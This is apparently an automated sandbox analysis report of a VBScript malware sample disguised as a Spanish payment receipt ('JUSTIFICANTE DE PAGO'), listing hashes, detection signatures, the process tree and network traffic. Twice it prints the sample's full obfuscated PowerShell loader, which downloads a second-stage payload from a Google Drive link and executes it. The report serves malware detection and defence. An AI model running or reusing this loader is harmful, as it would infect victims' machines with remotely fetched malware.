Windows Analysis Report
JUSTIFICANTE DE PAGO.vbs

Overview

General Information

Sample name: JUSTIFICANTE DE PAGO.vbs
Analysis ID: 1430768
MD5: 98cded86c15d6f27d03e1ff9443cc0a2
SHA1: aa7e6cf10ace8891de39a6340b62b84f15d39a98
SHA256: a2793f248743616fac792f8d191c26c9d65f63ff1016820508cbda367b906e24
Tags: vbs

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7296 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7348 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1 T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage 'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. 
';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea .amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa, ');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl sInconiSpiriaBoros.M,resST,nerkTypiseOd.rl Pella&Ti sm& Hall Be pee N.ttcSawbohNontioDepre Fraso$incor ';Multiplikatorernes (Ulnage 'domin$ .tolgStje lIn,oroSkarpbMut naBlo,llSt ig:CerasN MuniuOmplal GraniPluggnKanoedUnmelkKarbuoH.rdemTaws.sFolketFr.dreS,urrnMotte=Jrgen(P.eudcdebr.mI,cludVrks. ommis/Mastec Foli Te.n$AmesiGMoolee Deicr.ninnm,seudiFi,kon bankd M.te)Ratla ');Multiplikatorernes (Ulnage 'Metop$H.insglgegulJulefoTrg,ebF.rmuaFortelDek.i:EndomPPost.cJvn,aeTeglbrNo ennKontreKant,=Kia.c$Cu geB SkralUngkaiCamankass,cd YorkaFla,kaSa.ansalmineplumbsSeven9Mis n3Magts. 
Bunds ,udep MagnlStu,ei FoshtDrosk(.anso$B,oncT S.rii Hal,mGra,ubDominaJuleflGodfreResorrDistrnMonete Gon,sSpad )Kolle ');$Blikdaases93=$Pcerne[0];Multiplikatorernes (Ulnage 'hyste$MejetgKa hilGenneoScapub kil,aMo erl odbo:AltdeF StillKegleaRealla Udfre num dCecomeAfflas Cu a=Emo,iNMarsie ,ecywSolec-Vok eOKri,kbGromwjSpokee Alp.cm telt est R,kniSChampyPlatisFiksptRespeeSolstmArthr.SaalsNVedlieDentitNivel.C,ppeWPissoeTroopb exogC .ndmlRubbeir.geneFertinR,abatOverk ');Multiplikatorernes (Ulnage 'Uns.c$ orkyFcornllLogisaFo,ocaAr heeRehabdKor,meIna.ssEdder.HalsyHNonnaeDe,okaLnmo,d OctoeNi rorMakahsC.chi[,efen$DirekZ Rehoo VaadoPav,lt orskeBatekcMa.keh Ul,mnKluppi.progcMyeloiQuinta KratnMonod]Intra=Stj,t$AlmiruIlystnWel cldehumoMaalegMacergZuluke .ecrdLgdsl ');$Afsbe=Ulnage 'Bi,isFVideolSpermaRensnaHulleeOutwrd Fu,deStabisSkr s.hymenDAur.doZ chiw solinSnk mlGuffao Pr raMiliedToldsF Troni StrolV.scue Fu,u(Ballo$TetraBRussilimproi U,cokFelind Dis,aUn,ola Cha.sR puneAabe,sGreen9 ,itz3Ene.r,,ngka$ Te.aSCompalMesenaAfgifvS.atuiSdmlkcPu.leiClarssAktivmGynec)Samm. 
';$Afsbe=$Nulindkomsten[1]+$Afsbe;$Slavicism=$Nulindkomsten[0];Multiplikatorernes (Ulnage ',uper$ sentg TodalRemado ,emtbBroncaSkridlIndfr:OtterbTrillr vsavnmattieForbdrStagniGenang Du.itPorceiAmbitgAntipt Oret=Preme( emicTH.rtaePerfesQueuetviske-Ansl.PRgt baWhysutkonsehFrems Stvl$Dje aSDividl BeboaUd,mnvVe.stiCrittc phioila insCanalmAntig)Brnee ');while (!$brnerigtigt) {Multiplikatorernes (Ulnage 'Stvht$FlgesgambitlLip roSk,lpbAi,maanrc,elRodma:UndisUSjl,gn Sd,krStuk,eHarefeHexoslA.usts Vask=A.sor$brnebtFa.ulrSowe.u,arsveFinva ') ;Multiplikatorernes $Afsbe;Multiplikatorernes (Ulnage '.eddaSMetattTropiakontrrSvendtArmad-GenneS Salgl Coque SvineNegripSemic L,sa4Drosc ');Multiplikatorernes (Ulnage ' St,r$Sadelg GawklSheepo ZoanbJageraRejuvl Beta:Intrab VacirVitt nFeasie UdskrMarroiS.uthgpetertForhaiCtenogNicottStres=Ph.no( Go aT TrekeBlufrsO,dbotjudie- eviPSpiseaIndsktMellsh.lymp Afste$ ndhfSAlkyllNydamaRegervBrygniPregucauto.iE,katsuma,dm rav) Uncr ') ;Multiplikatorernes (Ulnage ' ,rom$Over g,minolOsteooAfganbPolysaUdstalTerme: chuPAnacrrT,anseHenleeOutwav adreaDresspRetshoAntiorMrkbaab.llitPe.arolys,nrRosin2Famil5Overw5Alon,=Perfi$C zsegGlsnil PoleoTilskbF,rroaSa dslVatic: uldkSFre nkSamk.iHoopslAfhjed Tnd.psuperaVolvodR,ekadRa.ioe Tomjs Log kMe tra DisklHelfalHetere Kavin SalgsFinan+Tomas+Doura% .uni$KompeP halac Intee GnomrIndslnSlgerereaff.RecescPhospol resuTu ann C aitAfter ') ;$Blikdaases93=$Pcerne[$Preevaporator255];}Multiplikatorernes (Ulnage 'Dis,i$ Prs gJenvrl S.fforesunb ,ndhaG.ardl Etho: RagoePreofxRappetFritieUnshrn AfsluZonataCimeltSel.pePomfrsLin.e Koord=Kunst LandsGUdsleeSomnitunapp-GoldrCG.nero.nrusnF,nget UdsteprobonChiddtLigni Disti$FideiSDurrylRosmuaAzotiv F,owi Ca bc S,ili nugssBromams,kke ');Multiplikatorernes (Ulnage 'P gna$HammegM,cedl .dlaoAdvarbnyctiaSprngl Thai:SortkJUniveu.lassnNowisgTubereSpo.tnAntar D.sm= Nati G nan[ ,ngsSamicryBrndesForvatKursueAssurmAntit.critiC Ejenoin,skn.atiivGlasbe Tet,rLollate.han] vera:Spe.t: OmdaF 
GuilrAd.lsoWhaurmTra,sBSkaftaDisarsMrsgeeStutt6amanu4Haa dSSlvsmt,nartrP,rceiBeraanA tisgSt.rt(,fsbn$MaijaeS,imlxH riztv loueCheckn ApotuBore,aMorget FredeBack,sHaema)Rekto ');Multiplikatorernes (Ulnage 'Kv li$ExcalgLipaelstatsoStamkbKapseadittel Gard:BatchFKvienoGaranr dfylmOr.adi J.rln BrowdLeaves Mungk L,moeAbortdOutrieNedsksTill. Ba,sk=flako Opsp[S.oroSsubcayR,mblsTafiat wargestemmmGdann. FilaT.tivkePursuxAger,tUigen.Su.phESk,ffnObskuc GardoOverbd etriTropin Petegsigte] Unco:Sfyrb:Sub oAFane,SAnnitC.tykpICo.meIMento. NaioG telteDissotBrintSVidnet Regnr,mpori ayinnGaiasgRing (Ach.n$NonexJSusp.uBatisnRick gCaj.teL.dlenConvo) egre ');Multiplikatorernes (Ulnage 'F.age$Te.reg Frikl UdenoKos.eb IldfaExtralNonig:sminkcMenarhlin,oeGor lcUfuldkOutruhAra ieLarmefrhabdtCun,ieWittitFrems=Preco$ multFCurcuoG anirInfiemBearii StubnFlovpd StiksDelp.kTot.ee Vidtd Yu,eeFablesDesta. Pe,isF lthuSkillbHerlisPolyctFo slr ForhiFor,in ThyrgOptic( Spec2Ickin9Hotel7Inc,m6Forbr8Asphy4deute,Siksa2Civ l8Phyll0Unind8 In.v1Riste)Bykva ');Multiplikatorernes $checkheftet;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7508 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Somesthesia.Ske && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
No configs have been found
Source: Process Memory Space: powershell.exe PID: 7348; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Source: amsi64_7348.amsi.csv; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen

System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", ProcessId: 7296, ProcessName: wscript.exe
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", ProcessId: 7296, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1 T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage 'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. 
';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea .amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa, ');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl sInconiSpiriaBoros.M,resST,nerkTypiseOd.rl Pella&Ti sm& Hall Be pee N.ttcSawbohNontioDepre Fraso$incor ';Multiplikatorernes (Ulnage 'domin$ .tolgStje lIn,oroSkarpbMut naBlo,llSt ig:CerasN MuniuOmplal GraniPluggnKanoedUnmelkKarbuoH.rdemTaws.sFolketFr.dreS,urrnMotte=Jrgen(P.eudcdebr.mI,cludVrks. ommis/Mastec Foli Te.n$AmesiGMoolee Deicr.ninnm,seudiFi,kon bankd M.te)Ratla ');Multiplikatorernes (Ulnage 'Metop$H.insglgegulJulefoTrg,ebF.rmuaFortelDek.i:EndomPPost.cJvn,aeTeglbrNo ennKontreKant,=Kia.c$Cu geB SkralUngkaiCamankass,cd YorkaFla,kaSa.ansalmineplumbsSeven9Mis n3Magts. Bunds ,udep MagnlStu,ei FoshtDros
No Snort rule has matched

AV Detection

Source: http://pesterbdd.com/images/Pester.png; URL Reputation: Label: malware
Source: JUSTIFICANTE DE PAGO.vbs; ReversingLabs: Detection: 21%
Source: JUSTIFICANTE DE PAGO.vbs; Virustotal: Detection: 8%
Source: unknown; HTTPS traffic detected: 142.250.101.100:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1809922936.000001FF75D2C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb2 source: powershell.exe, 00000001.00000002.1809922936.000001FF75D2C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.1824372929.000001FF75F84000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbiTP)l source: powershell.exe, 00000001.00000002.1824372929.000001FF75F84000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1810470481.000001FF75F20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dows\dll\mscorlib.pdb source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb{Yy source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbz source: powershell.exe, 00000001.00000002.1810470481.000001FF75F5E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ll\System.Core.pdb~YD source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic; HTTP traffic detected: GET /uc?export=download&id=1kXTNaoxLJphfcAVSlYxVolD7HuHhKCJX HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /download?id=1kXTNaoxLJphfcAVSlYxVolD7HuHhKCJX&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.usercontent.google.com Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; DNS traffic detected: queries for: drive.google.com
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FB24000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000001.00000002.1801801088.000001FF6DAB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5D901000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5D901000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FAE6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5F936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com/uc?export=download&id=1kXTNaoxLJphfcAVSlYxVolD7HuHhKCJXP
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE3D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE3D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.usercontent.google.com/download?id=1kXTNaoxLJphfcAVSlYxVolD7HuHhKCJX&export=download
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5ECD1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1801801088.000001FF6DAB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.gstatic.com
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown; Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49730 -> 443

System Summary

Source: amsi64_7348.amsi.csv, type: OTHER; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7348, type: MEMORYSTR; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe; Process created: Commandline size = 7086
Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
